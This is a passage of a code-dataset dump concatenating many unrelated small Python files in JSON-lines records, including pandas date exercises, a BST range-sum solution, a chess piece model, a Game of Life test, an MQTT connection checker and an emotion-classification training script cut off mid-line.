päivämäärä\ndef two_way_linked(df,rank): # The rank() function is used to compute numerical data ranks (1 through n) along axis. By default, equal values are assigned a rank that is the average of the ranks of those values.\n before_element = df.loc[df[\"id\"] == rank-1] # Here I call the 182.element\n first_element = df.loc[df[\"id\"]==rank]\n after_element = df.loc[df[\"id\"] == rank+1] # here I call the 184.element\n return before_element,first_element,after_element\n\na,b,c = two_way_linked(df,183)\nprint(a,b,c)\n\ndf[\"days\"]= pd.to_datetime(df['dates']).dt.day\n\n#df.loc[(df[\"days\"]%3 == 0) & (df[\"days\"]%6 != 0)][\"dates\"].count()\n\n\n### Tulostetaan päivämäärät, jotka ovat jaollisia kolmella, mutta ei kuudella.\ndef day_divide_three_not_six(df,column):\n return df.loc[(df[column]%3 == 0) & (df[column]%6 != 0)][\"dates\"].to_frame()\n\nday_divide_three_not_six(df,\"days\")\n\n### Käännetään listan elementit toisinpäin eli 13.1.2023 on esimmäinen elementti ja 1.1.2022 on viimeinen.\ndef reverse_dataframe(df):\n return df.iloc[::-1] ### .iloc[] is primarily integer position based (from 0 to length-1 of the axis)\n\n\n\nreversed_df = df.loc[::-1]\nreversed_df.head()\n\nreversed_df.index\nreversed_df = reversed_df.reset_index()\n\nreversed_df = reversed_df.drop(columns = \"index\")\nreversed_df.head()\n### Tulostetaan ensimmäisen listan kolmella, mutta ei kuudella jaollisen alkion päivien erotus käännetyn listan ensimmäiseen samoilla ehdoilla haettuun alkioon.\n\nfirs_df = day_divide_three_not_six(df,\"days\")\nsecond_df = day_divide_three_not_six(reversed_df,\"days\")\n\ndef reset_drop_index(df):\n df = df.reset_index()\n df = df.drop(columns = \"index\")\n return df\n\nfirs_df = reset_drop_index(firs_df)\nsecond_df = reset_drop_index(second_df)\n\ntype(firs_df)\n#df['C'] = (df['B'] - df['A']).dt.days\nthird_df = pd.DataFrame()\n\nthird_df[\"dates\"] = (second_df[\"dates\"] - firs_df[\"dates\"]) / np.timedelta64(1,\"D\")\n\nthird_df.head(1) # first index (ensimmäinen indeksi)\n","repo_name":"ser-2007/python_task_dates","sub_path":"dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70418612089","text":"from typing import Optional\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def rangeSumBST(self, root: Optional[TreeNode], low: int, high: int) -> int:\n if not root:\n return 0\n s = 0\n if root.val >= low and root.val <= high:\n s += root.val\n if root.left and low < root.val:\n s += self.rangeSumBST(root.left, low, high)\n if root.right and high > root.val:\n s += self.rangeSumBST(root.right, low, high)\n return s\n","repo_name":"d2macster/leetcode-python","sub_path":"E/E938_RangeSumBST.py","file_name":"E938_RangeSumBST.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1173764706","text":"from termcolor import cprint\nfrom .constants import PIXEL_SIZE\n\n\ndef colorize(color: int) -> None:\n \"\"\"\n Принимает в качестве аргумента число,\n после чего выводит в консоль пиксель\n определенного цвета, следуя следующей схеме:\n 0 - 'поле' - белый\n 1 - 'танк' - синий\n 2 - 'снаряд' - красный\n *** Используются функции пакета termcolor\n \"\"\"\n if color == 0:\n cprint(' ' * PIXEL_SIZE, on_color='on_white', sep='', end='')\n elif color == 1:\n cprint(' ' * PIXEL_SIZE, on_color='on_blue', sep='', end='')\n elif color == 2:\n cprint(' ' * PIXEL_SIZE, on_color='on_red', sep='', end='')\n\n\ndef render(playing_field: tuple) -> None:\n \"\"\"\n Принимает в качестве аргумента кортеж - матрицу (игровое поле)\n и выводит (отрисовывает) его в консоль в соответствии с цветом пикселя,\n который задается цифрой, являющейся элементом матрицы,\n где соблюдается следующее соответствие:\n 0 - 'поле' - белый\n 1 - 'танк' - синий\n 2 - 'снаряд' - красный\n *** Используются функции пакета termcolor\n \"\"\"\n for row in playing_field:\n for column in row:\n colorize(column)\n print()\n print('\\n')\n","repo_name":"AlSavIg/Games","sub_path":"Tanks/Packages/rendering.py","file_name":"rendering.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38918295265","text":"'''\n Author: sonik.-\n Project Created Date: March 21, 2022\n Last Update: September 26, 2022\n Purpose: This program reads in data from us-states-covid.csv (https://github.com/nytimes/covid-19-data) and provides the following data visualizations.\n (1) Line chart of total COVID cases in the Washington\n (2) Box Plot of total cases (Peak)\n Question answered: This program aims to answer the following questions:\n (1) Total COVID-19 cases in the Washington state\n (2) The trend of COVID-19 in the Washington state\n (3) The most dangerous and safest time during COVID in the Washington state\n'''\nimport graphical as grph\n'''\n File Name: data_visualization_main.py\n Note: This module is the main method. It also answers the targetted questions and run the methods in `graphical.py`.\n'''\n\n\"\"\" ------------------------------------------------------------------------------------------ MAIN ------------------------------------------------------------------------------------------\"\"\"\nprint(\"This program will be providing charts and graph for daily new cases and deaths regarding to COVID-19 in Washington state.\")\n\n# CSV Dataset is read into a list\ncovidData_WA = grph.csvHandling(\"us-states-covid.csv\", True) # return data type is a list of `WA_COVID` objects\n\n#print(f\"{covidData_WA.dates}\\n\\n{covidData_WA.cases}\\n\\n{covidData_WA.deaths}\") # check list data (you may ignore)\n\n\n# Line Chart\ngrph.covid_lineplot(covidData_WA)\n\n\n# Box Plot\ngrph.covid_boxplot(covidData_WA)\n\n\n# 3 data related questions and answes (complexity)\ngrph.ans2ques(covidData_WA)","repo_name":"sonikkk-526/COVID-Data-Visualization","sub_path":"src/data_visualization_main.py","file_name":"data_visualization_main.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5816575638","text":"from sklearn.feature_extraction.text import CountVectorizer\nimport re\nimport pickle\n\nclass nlp_pipeline:\n\n def __init__(self, vectorizer=CountVectorizer(), tokenizer=None, cleaning_function=None, \n stemmer=None, lemm=None, model=None):\n if not tokenizer:\n tokenizer = self.splitter\n if not cleaning_function:\n cleaning_function = self.clean_text\n self.stemmer = stemmer\n self.lemm = lemm\n self.tokenizer = tokenizer\n self.model = model\n self.cleaning_function = cleaning_function\n self.vectorizer = vectorizer\n self._is_fit = False\n self.words = None\n self.topics = None\n \n def splitter(self, text):\n return text.split(' ')\n \n def clean_text(self, text, tokenizer, stemmer, lemm):\n cleaned_text = []\n for doc in text:\n cleaned_words = []\n for word in tokenizer(doc):\n low_word = re.sub('[\\d\\W]','', word).lower()\n if stemmer:\n low_word = stemmer.stem(low_word)\n if lemm:\n low_word = lemm.lemmatize(low_word)\n cleaned_words.append(low_word)\n cleaned_text.append(' '.join(cleaned_words))\n return cleaned_text \n\n def fit_transform(self, text):\n clean_text = self.cleaning_function(text, self.tokenizer, self.stemmer, self.lemm)\n self.words = self.vectorizer.fit_transform(clean_text)\n self.topics = self.model.fit_transform(self.words)\n self._is_fit = True\n return self.topics\n\n def transform_new(self, text):\n clean_text = self.cleaning_function(text, self.tokenizer, self.stemmer, self.lemm)\n self.words_new = self.vectorizer.transform(clean_text)\n self.topics_new = self.model.transform(self.words_new)\n return self.topics_new\n\n def print_topics(self, num_words=10):\n feat_names = self.vectorizer.get_feature_names()\n for topic_idx, topic in enumerate(self.model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feat_names[i] for i in topic.argsort()[:-num_words - 1:-1]])\n print(message)","repo_name":"angarney/news_anti_recommendation_system","sub_path":"Project_Development/Modeling/topic_modeling_class.py","file_name":"topic_modeling_class.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7266620091","text":"import torch\nimport math\nimport cross_validation\nfrom loss import LossMSE, LossMAE, CrossEntropy\nfrom helpers import generator\n\n\nclass Optimizer:\n def __init__(self, models, names, epochs = 100, mini_batch_size = 4, criterion = \"MSE\",\n learning_rate = 0.001, Adam = True, epsilon = 1e-8, beta_1 = 0.9, beta_2 = 0.999):\n \"\"\" Constructor of the Train class, enables to train multiple networks.\n\n :param models: list of the model(s)\n :param epochs: number of epochs\n :param mini_batch_size: mini_batch size\n :param criterion: if \"MSE\", use the MSE loss; if \"MAE\" it will be the MAE loss function.\n :param learning_rate: learning rate for optimization of parameters.\n :param epsilon: small value preventing from zero division.\n :param beta_1: hyperparameter for the calculation ot the mean in the Adam optimizer.\n :param beta_2: hyperparameter for the calculation ot the variance in the Adam optimizer.\n\n :return: the models and their accuracy in a dictionnary.\n \"\"\"\n\n # Models and info :\n self.models = models\n self.names = names\n\n # Parameters for duration:\n self.epochs = epochs\n self.mini_batch_size = mini_batch_size\n if criterion == \"MSE\":\n self.criterion = LossMSE()\n elif criterion == \"MAE\":\n self.criterion = LossMAE()\n elif criterion == \"CE\":\n self.criterion = CrossEntropy()\n # Parameters for the optimization (with Adam):\n self.Adam = Adam\n self.learning_rate = learning_rate\n self.epsilon = epsilon\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.step = 0\n\n def train(self, train_input, train_labels, verbose = False):\n \"\"\" Training of the model(s) with either stochastic gradient descent or\n with adam optimizer if param Adam is True.\n \"\"\"\n for model, name in zip(self.models, self.names):\n if verbose:\n print('Training {}...'.format(name))\n for epoch in range(self.epochs):\n loss = 0.0\n\n for batch_index in range(0, train_input.size(0), self.mini_batch_size):\n batch_input = train_input.narrow(0, batch_index, self.mini_batch_size)\n batch_labels = train_labels.narrow(0, batch_index, self.mini_batch_size)\n\n model.zero_grad()\n\n pred = model.forward(batch_input)\n loss += self.criterion.forward(pred, batch_labels)\n\n gradwrtoutput = self.criterion.backward()\n model.backward(gradwrtoutput)\n\n if self.Adam:\n self.adam_optimizer()\n else:\n self.stochastic_gradient_descent()\n\n min_loss = loss.min()\n epoch_min_loss = loss.argmin()\n\n if verbose:\n print('Epoch = {}, {} Loss = {}, Best Epoch = {}, Best Val = {}'.format(epoch, self.criterion, loss, epoch_min_loss, min_loss))\n\n\n def stochastic_gradient_descent(self):\n \"\"\" Update of the weight and bias parameters of the model(s). \"\"\"\n self.step += 1\n\n for model in self.models:\n model.gradient_descent(learning_rate = self.learning_rate)\n\n def adam_optimizer(self):\n \"\"\" optimization with Adam. \"\"\"\n\n self.step += 1\n\n for model in self.models:\n for (w_b, grad, mean, var) in model.param():\n mean = self.beta_1 * mean + (1-self.beta_2) * grad\n var = self.beta_2 * var + (1-self.beta_2) * grad**2\n\n mean_hat = mean / (1 - self.beta_1**(self.step + 1))\n var_hat = var / (1 - self.beta_2**(self.step + 1))\n\n w_b.sub_(self.learning_rate * mean_hat / (var_hat.sqrt() + self.epsilon))\n\n def compute_accuracy(self, test_input, test_labels):\n \"\"\" Compute the model(s) prediction accuracy. \"\"\"\n accuracy = torch.zeros((len(self.names),1))\n\n for index, model in enumerate(self.models):\n predicted_labels = model.forward(test_input)\n grad = model.zero_grad()\n accuracy[index] = (predicted_labels.argmax(dim = 1) == test_labels).float().mean()\n\n return accuracy\n","repo_name":"GBNTN/DeepLearningProject","sub_path":"project02/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24526795198","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nGame of life simple script for checking init states and checking if the evolution is\r\nimplemented correctly.\r\n\r\nCreated on Tue Jan 15 12:37:52 2019\r\n\r\n@author: shakes\r\n\"\"\"\r\nimport conway\r\n\r\nN = 64\r\n\r\n# create the game of life object\r\nlife = conway.GameOfLife(N)\r\n# life.insertBlinker((0,0))\r\nlife.insertGlider((0,0)) # It travels diagonally across the Life grid at a speed of c/4\r\n# life.insertGliderGun((0,0)) # Gosper glider gun consists of two queen bee shuttles stabilized by two blocks.\r\n# life.insertFromFile(\"snail spaceship.cells\", (0,30))\r\n# life.insertFromFile(\"dragon spaceship.cells\", (0,30))\r\n# life.insertFromFile(\"ak94 gun.cells\", (0,0))\r\n# life.insertFromFile(\"vacuumgun gun.cells\", (0,0))\r\n# life.insertFromFile(\"stargate oscillator.cells\", (0,0))\r\n# life.insertFromFile(\"7enginecordership spaceship.cells\", (0,0))\r\ncells = life.getStates() # initial state\r\n\r\n# evolve once\r\nlife.evolve()\r\ncellsUpdated1 = life.getStates()\r\n\r\n# evolve twice\r\nlife.evolve()\r\ncellsUpdated2 = life.getStates()\r\n\r\n# -------------------------------\r\n# plot cells\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nplt.figure(num=0)\r\nplt.gray()\r\nplt.imshow(cells) # initial state\r\nax = plt.gca()\r\n# Minor ticks\r\nax.set_xticks(np.arange(-.5, N, 1), minor=True);\r\nax.set_yticks(np.arange(-.5, N, 1), minor=True);\r\n# grid\r\nax.grid(which='minor', color='w', linestyle='-', linewidth=1)\r\n\r\nplt.figure(num=1)\r\nplt.imshow(cellsUpdated1) # evolve once\r\nax = plt.gca()\r\n# Minor ticks\r\nax.set_xticks(np.arange(-.5, N, 1), minor=True);\r\nax.set_yticks(np.arange(-.5, N, 1), minor=True);\r\n# grid\r\nax.grid(which='minor', color='w', linestyle='-', linewidth=1)\r\n\r\nplt.figure(num=2)\r\nplt.imshow(cellsUpdated2) # evolve twice\r\nax = plt.gca()\r\n# Minor ticks\r\nax.set_xticks(np.arange(-.5, N, 1), minor=True);\r\nax.set_yticks(np.arange(-.5, N, 1), minor=True);\r\n# grid\r\nax.grid(which='minor', color='w', linestyle='-', linewidth=1)\r\n\r\nplt.show()\r\n","repo_name":"danielzhangau/Modern-Computation","sub_path":"3gameoflife lab/test_gameoflife_glider_simple.py","file_name":"test_gameoflife_glider_simple.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35014639947","text":"from public.schemas.github import PushPayload\nfrom sonja.client import Crawler\nfrom sonja.database import Session\nfrom sonja.model import Repo\n\n\ndef process_push(session: Session, crawler: Crawler, payload: PushPayload):\n if not payload.after or not payload.ref:\n return\n\n https_repos = session.query(Repo)\\\n .filter_by(url=f\"https://github.com/{payload.repository.full_name}.git\")\\\n .all()\n\n ssh_repos = session.query(Repo)\\\n .filter_by(url=f\"git@github.com:{payload.repository.full_name}.git\")\\\n .all()\n\n for repo in https_repos + ssh_repos:\n crawler.process_repo(str(repo.id), payload.after, payload.ref.removeprefix(\"refs/\"))\n","repo_name":"uboot/sonja-backend","sub_path":"services/public/crud/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17710389073","text":"import re\nimport numpy as np\nimport string\nimport collections\n\n## Input\nwith open('input.txt') as f:\n input = f.read()\n\nlines = input.strip().split('\\n')\n\npairs = list([])\n\nfor i in range(0,len(lines)):\n\tpairs.append(re.findall(r\"p ([A-Z]*)\",lines[i]))\n\n# class myLetter:\n\n# \tdef __init__(self, letter):\n# \t\tself.letter = letter\n# \t\tself.before = list([])\n# \t\tself.after = list([])\n\n# \tdef prereq(self, next_letter):\n# \t\tself.before.append(next_letter)\n\n# \tdef depends_on(self, last_letter):\n# \t\tself.after.append(last_letter)\n\nalpha_dict = {}\n\nalpha_list = list(string.ascii_uppercase)\n#alpha_list = list(string.ascii_uppercase)[0:6]\n\nfor letter in alpha_list:\n\talpha_dict[letter] = []\n\nfor i in range(0,len(lines)):\n \talpha_dict[pairs[i][1]].append(pairs[i][0])\n\nprint(alpha_dict)\n\nn = len(alpha_list)\nansString = ''\nstill_left = alpha_list\nwhile n > 0:\n\ta = len(still_left)\n\ti = 0\n\twhile i < a:\n\t\tletter = still_left[i]\n\t\t#print(letter)\n\t\ti = i + 1\n\t\tif len(alpha_dict[letter]) == 0:\n\t\t\talpha_dict.pop(letter)\n\t\t\tstill_left.remove(letter)\n\t\t\tansString += letter\n\t\t\tprint(letter)\n\t\t\tprint(ansString)\n\t\t\tn = n - 1\n\t\t\tfor letter2 in still_left:\n\t\t\t\tif letter in alpha_dict[letter2]:\n\t\t\t\t\talpha_dict[letter2].remove(letter)\n\t\t\ta = a - 1\n\t\t\ti = 0\n\t\t#IBJTUWGFKDNVEYHQAOMPCRLSZX\n\nprint(ansString)","repo_name":"srmwright/advent","sub_path":"2018/7/.ipynb_checkpoints/part1-checkpoint.py","file_name":"part1-checkpoint.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9333930815","text":"from __future__ import annotations\n\nimport logging\n\nfrom .instance import Instance\nfrom .jsonrpc import (\n JsonRpcFuture,\n JsonRpcManager,\n JsonRpcReply,\n JsonRpcRequest,\n serialize_request_to_binary,\n serialize_request_to_text,\n)\nfrom .websocket import WebSocket\n\n\nclass Client(Instance):\n def __init__(\n self, websocket: WebSocket, logger: logging.Logger, manager: JsonRpcManager\n ) -> None:\n self._websocket = websocket\n self._logger = logger\n self._manager = manager\n\n @property\n def connected(self) -> bool:\n return not self._websocket.closed\n\n def disconnect(self) -> None:\n self._logger.info(\"Disconnection from Brayns instance.\")\n self._websocket.close()\n self._manager.clear()\n\n def is_running(self, id: int | str) -> bool:\n return self._manager.is_running(id)\n\n def send(self, request: JsonRpcRequest) -> JsonRpcFuture:\n self._logger.info(\"Send request: %s.\", request)\n self._logger.debug(\"Request params: %s.\", request.params)\n self._logger.info(\"Request binary: %d bytes.\", len(request.binary))\n self._send(request)\n return self._create_future(request.id)\n\n def poll(self, block: bool) -> None:\n self._logger.debug(\"Polling messages from Brayns instance.\")\n self._websocket.poll(block)\n\n def cancel(self, id: int | str) -> None:\n self._logger.info(\"Cancel request with ID %s.\", id)\n self.request(\"cancel\", {\"id\": id})\n\n def _send(self, request: JsonRpcRequest) -> None:\n if request.binary:\n data = serialize_request_to_binary(request)\n self._logger.debug('Request binary frame data: \"%s\".', data)\n self._websocket.send_binary(data)\n return\n data = serialize_request_to_text(request)\n self._logger.debug('Request text frame data: \"%s\".', data)\n self._websocket.send_text(data)\n\n def _create_future(self, id: int | str | None) -> JsonRpcFuture:\n if id is None:\n reply = JsonRpcReply.for_notifications()\n return JsonRpcFuture.from_reply(reply)\n return JsonRpcFuture(\n task=self._manager.create_task(id),\n cancel=lambda: self.cancel(id),\n poll=lambda block: self.poll(block),\n )\n","repo_name":"BlueBrain/Brayns","sub_path":"python/brayns/network/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"77"} +{"seq_id":"72764658810","text":"import paho.mqtt.client as mqtt\nimport sys\n# set server and port to the first two arguments\nif len(sys.argv) < 3:\n print(\"Usage: python3 mqtt_connect.py \")\n sys.exit(1)\nserver = sys.argv[1]\nport = int(sys.argv[2])\n\nclient = mqtt.Client()\n# connect to the server\ntry:\n code = client.connect(server, port, 60)\n if code == 0:\n print(f\"Connection to {server} on port {port} sucessful\")\n else:\n print(f\"result code was {code}\")\nexcept Exception as e:\n print(f\"excepetion occured {e}\")\n\n\n","repo_name":"tavdog/tidbyt-manager","sub_path":"mqtt_server_checker.py","file_name":"mqtt_server_checker.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31421042043","text":"from copy import copy\n\nclass Piece(object):\n def __init__(self, color, spot, board): # Have every piece hold its spot, then when moving you can check existing game piece's spot and use that for moving/attacking\n self.color = color\n self.spot = spot #pass in the spot when filling board\n self.board = board\n self.first_move = True\n\n if self.color == 'white':\n self.char = self.white \n self.reverse_char = self.black\n else: \n self.char = self.black \n self.reverse_char = self.white \n\n def __repr__(self):\n return self.char\n \n def king_in_check(self, spot): \n return self.test_move(spot, self.king_in_check_helper)\n\n def king_in_check_helper(self, spot): \n king = self.get_king()\n if not king:\n return False\n return king.in_check(king.spot)\n\n def get_king(self):\n king_list = filter(lambda x: isinstance(x, King) and x.color == self.color, self.board.flatten()) \n if len(king_list) == 0:\n return False\n return king_list[0]\n\n def get_spot(self, diff): #converts the spot difference into the next possible spot(s)\n if self.color == 'black':\n diff[0] *= -1\n \n new_row, new_col = diff[0] + self.spot[0], diff[1] + self.spot[1]\n return [new_row, new_col]\n \n def move(self, next_spot):\n if self.valid_move(next_spot):\n piece = self.board.grid[next_spot[0]][next_spot[1]] \n if isinstance(piece, Piece):\n piece.spot = None\n self.board.grid[self.spot[0]][self.spot[1]] = ' '\n self.spot = next_spot\n self.board.grid[self.spot[0]][self.spot[1]] = self\n self.first_move = False\n\n def valid_move(self, next_spot): # return true or false \n if next_spot in self.possible_moves():\n return True\n else:\n return False\n\n def check_spot(self, spot, check_king=True):#checks the spot to see if it is empty and if it is in bounds of the board \n if self.board.in_bounds(spot):\n if check_king and self.king_in_check(spot):\n return False \n if self.board.spot_empty(spot):\n return True\n other_piece = self.board.grid[spot[0]][spot[1]]\n if isinstance(other_piece, Piece) and other_piece.color != self.color:\n return True \n return False \n \n def test_move(self, spot, function): #spot: the spot you want to move, function: in_check_helper\n if not self.board.in_bounds(spot):\n return False\n original_spot = copy(self.spot) # copys original spot\n test_spot = self.board.grid[spot[0]][spot[1]] # gives the actual board location of the spot you want to move\n\n self.board.grid[self.spot[0]][self.spot[1]] = ' ' # sets the current spot of the piece to empty\n self.spot = spot # sets the pieces spot to the new spot \n self.board.grid[spot[0]][spot[1]] = self # assigns the piece to the new spot\n \n result = function(spot) #calls the in_check_helper on he spot to see if the \n #new state of the board puts the king in check\n self.board.grid[self.spot[0]][self.spot[1]] = test_spot #next 3 lines revert board to original state.\n self.spot = original_spot\n self.board.grid[self.spot[0]][self.spot[1]] = self \n\n return result \n \n def possible_moves(self, check_king=True):\n return self.get_sliding_moves(check_king=check_king)\n\n def get_sliding_moves(self, check_king=True):\n poss = []\n for diff in self.dir_diffs:\n spot = self.get_spot(diff)\n new_diff = copy(diff)\n while self.check_spot(spot, check_king):\n poss.append(spot)\n if self.board.in_bounds(spot) and not self.board.spot_empty(spot):\n break \n new_diff[0] += diff[0]\n new_diff[1] += diff[1]\n spot = self.get_spot(new_diff)\n \n return poss\n \n\nclass Pawn(Piece):\n white = u'\\u2659'\n black = u'\\u265F'\n \n def possible_moves(self, check_king=True): #returns a list of the possible moves\n if self.first_move:\n poss_empty = map(self.get_spot, [[-1, 0], [-2, 0]])\n if not self.board.spot_empty(poss_empty[0]): \n poss_empty = map(self.get_spot, [[-1, 0]])\n else:\n poss_empty = map(self.get_spot, [[-1, 0]])\n \n poss_taken = map(self.get_spot, [[-1, -1], [-1, 1]]) \n poss = []\n \n for spot in poss_empty:\n if self.board.in_bounds(spot) and self.board.spot_empty(spot): \n if check_king and self.king_in_check(spot):\n continue\n poss.append(spot)\n \n for spot in poss_taken:\n if self.board.in_bounds(spot) and not self.board.spot_empty(spot): \n if check_king and self.king_in_check(spot):\n continue\n poss.append(spot)\n \n return poss\n \nclass Knight(Piece): \n white = u'\\u2658' \n black = u'\\u265E'\n diffs = [[2, 1], [2, -1], [-2, 1], [-2, -1],\n [-1, 2], [-1, -2], [1, -2], [1, 2]]\n \n def possible_moves(self, check_king=True):\n poss = []\n for diff in self.diffs:\n spot = self.get_spot(diff)\n if self.check_spot(spot, check_king=check_king):\n poss.append(spot)\n \n return poss\n\nclass Bishop(Piece):\n white = u'\\u2657'\n black = u'\\u265D'\n dir_diffs = [[1, 1], [1, -1], [-1, 1] , [-1, -1]]\n\nclass Rook(Piece):\n white = u'\\u2656'\n black = u'\\u265C'\n dir_diffs = [[1, 0], [-1, 0], [0, -1], [0, 1]]\n \nclass Queen(Piece):\n white = u'\\u2655'\n black = u'\\u265B'\n dir_diffs = [[1, 1], [1, -1], [-1, 1] , [-1, -1], [1, 0], [-1, 0], [0, -1], [0, 1]]\n \nclass King(Piece):\n white = u'\\u2654'\n black = u'\\u265A'\n diffs = [[1, 1], [1, -1], [-1, 1] , [-1, -1], [1, 0], [-1, 0], [0, -1], [0, 1]]\n \n def possible_moves(self):\n poss = [] \n for diff in self.diffs:\n spot = self.get_spot(diff)\n if not self.in_check(spot) and self.check_spot(spot):\n poss.append(spot)\n \n return poss\n\n def in_check(self, spot): #spot: spot we want to move\n return self.test_move(spot, self.in_check_helper)\n \n\n def in_check_helper(self, spot): #Flattens board, filters kings and opposite color pieces from pieces, \n flat_board = self.board.flatten() \n pieces = filter(lambda x: isinstance(x, Piece) and x.color != self.color and not isinstance(x, King), flat_board)\n for piece in pieces:\n if spot in piece.possible_moves(check_king=False):\n return True # returns true if the spot you want to move is in any other pieces possible move list.\n \n return False \n","repo_name":"tylerprobst/Chess","sub_path":"Chess_pieces.py","file_name":"Chess_pieces.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30172193356","text":"def search(a,ele):\n\tstart= 0\n\tend=len(a)-1\n\twhile start<= end:\n\t\tmid = ( start + end )/2\n\t\tif (ele == a[mid]):\n\t\t\treturn 1\n\t\telif (ele > a[mid]):\n\t\t\tstart = mid+1\n\t\t\n\t\telse:\n\t\t\tend = mid - 1\n\treturn -1\nf = open('search.txt')\ntestcases = int(f.readline())\nfor i in range(0,testcases):\n\tlis2 = list(f.readline())\n\tb = int(lis2[2])\n\tlis3 = list(f.readline())\n\tlis4 = []\n\tfor i in lis3:\n\t\tif(i != ' ' and i != '\\n'):\n\t\t\tlis4.append(int(i))\n\ta = search(lis4 , b)\n\tprint(a)\n\n\t\n","repo_name":"Kratharth/ADA-1BM17CS035","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20204024377","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\n\nimport pickle\nimport numpy as np\nimport random as rn\n\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.layers import Attention\nfrom tensorflow.keras.layers import AdditiveAttention\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.models import load_model\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.utils import class_weight\nfrom sklearn.model_selection import train_test_split\n\nfrom model import build_model\nfrom data import load_data\nfrom config import LABEL_NAMES\n\nfrom gmu import GmuLayer\nfrom tfl import TflLayer\nfrom ggf import GgfLayer\n\n## Begin of settings for reproducible results\nimport os\nos.environ['PYTHONHASHSEED'] = '33'\nos.environ['TF_DETERMINISTIC_OPS'] = '1'\nnp.random.seed(33)\nrn.seed(33)\ntf.set_random_seed(33)\n#tf.random.set_seed(33)\n\nsess_conf = tf.ConfigProto(intra_op_parallelism_threads=1,\n inter_op_parallelism_threads=1)\nsess_conf.gpu_options.allow_growth = True\nsess_conf.log_device_placement = False\nsess = tf.Session(graph=tf.get_default_graph(), config=sess_conf)\nK.set_session(sess)\n## End of settings\n\nflags = tf.app.flags\nflags.DEFINE_string(name='mode', default='train', help='set running mode: train, test')\nflags.DEFINE_string(name='fusion', default='gmu', help='fusion model: concat, gmu, tfl')\nflags.DEFINE_string(name='source', default='audio_text', help='data source: audio, text, audio_text')\nflags.DEFINE_string(name='tokenizer_filename', default='tokenizer.pkl', help='file name of tokenizer')\nflags.DEFINE_string(name='train_filename', default='./time-mfcc/train.npz', help='train filename of the features data')\nflags.DEFINE_string(name='valid_filename', default=None, help='valid filename of the features data')\nflags.DEFINE_string(name='test_filename', default='./time-mfcc/test.npz', help='test filename of the features data')\nflags.DEFINE_integer(name='batch_size', default=32, help='number of examples in a batch')\nflags.DEFINE_integer(name='epochs', default=100, help='number of epochs')\nflags.DEFINE_integer(name='patience', default=5, help='patience before stopping training')\n\n\ndef train():\n source = flags.FLAGS.source\n fusion = flags.FLAGS.fusion\n train_filename = flags.FLAGS.train_filename\n valid_filename = flags.FLAGS.valid_filename\n batch_size = flags.FLAGS.batch_size\n epochs = flags.FLAGS.epochs\n patience = flags.FLAGS.patience\n\n x_train_audio, x_train_text, y_train = load_data(train_filename)\n #x_train_audio, x_train_text, y_train = shuffle(x_train_audio, x_train_text, y_train, random_state=28)\n\n if valid_filename is None:\n x_train_audio, x_valid_audio, x_train_text, x_valid_text, y_train, y_valid = train_test_split(\n x_train_audio, x_train_text, y_train, random_state=15, stratify=y_train, test_size=0.05)\n else:\n x_valid_audio, x_valid_text, y_valid = load_data(valid_filename)\n print('train:', x_train_audio.shape, x_train_text.shape, y_train.shape)\n print('valid:', x_valid_audio.shape, x_valid_text.shape, y_valid.shape)\n\n # compute class weights\n classes = np.unique(y_train)\n print(classes)\n weights = class_weight.compute_class_weight('balanced', classes, y_train)\n print(weights)\n\n # load tokenizer\n with open(flags.FLAGS.tokenizer_filename, 'rb') as tokenizer_file:\n tokenizer = pickle.load(tokenizer_file)\n\n model = build_model(len(classes), tokenizer['tokenizer'].word_index, tokenizer['num_words'], tokenizer['maxlen'],\n audio_input_shape=(x_train_audio.shape[1], x_train_audio.shape[2]), source=source, fusion=fusion)\n\n early_stopping = EarlyStopping(monitor='val_acc', patience=patience)\n checkpoint_callback = ModelCheckpoint('models/{}-{}-best.h5'.format(source, fusion),\n verbose=1, save_best_only=True, monitor='val_acc', mode='max')\n\n if source == 'audio':\n model.fit(x_train_audio, y_train, batch_size=batch_size, epochs=epochs, class_weight=weights,\n 